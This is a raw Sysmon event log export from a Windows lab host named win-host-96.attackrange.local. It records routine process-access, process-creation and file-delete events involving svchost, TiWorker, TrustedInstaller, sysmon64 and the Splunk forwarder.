12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292200Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292199Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292198Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.278{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292197Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.262{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 23542300x8000000000000000292196Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.241{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA60F9A788303666B06CF32ADDFD5C77,SHA256=D5A050A46F835136C7903F991B75FE277B92BA257B46B1E8F54C561EE4CB9F7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292195Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0B2A-00000000BB01}5240C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292194Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292193Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292192Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292191Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292190Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292189Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292188Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292187Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292186Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292185Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C1-6086-0500-00000000BB01}416952C:\Windows\system32\csrss.exe{BEA10069-028B-6088-0B2A-00000000BB01}5240C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292184Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0B2A-00000000BB01}5240C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292183Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000292182Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.173{BEA10069-028B-6088-0B2A-00000000BB01}5240C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{BEA10069-D0C2-6086-0C00-00000000BB01}728C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000292181Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.178{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292180Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.162{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292179Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.157{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43886422AB1DC2C6BD4206C50EBA1637,SHA256=70C7A354A5E615FCF651F6A058659244EA5A95A1DB02119451093431E033D539,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292178Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.157{BEA10069-D0C1-6086-0A00-00000000BB01}624788C:\Windows\system32\services.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292177Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.140{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292176Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 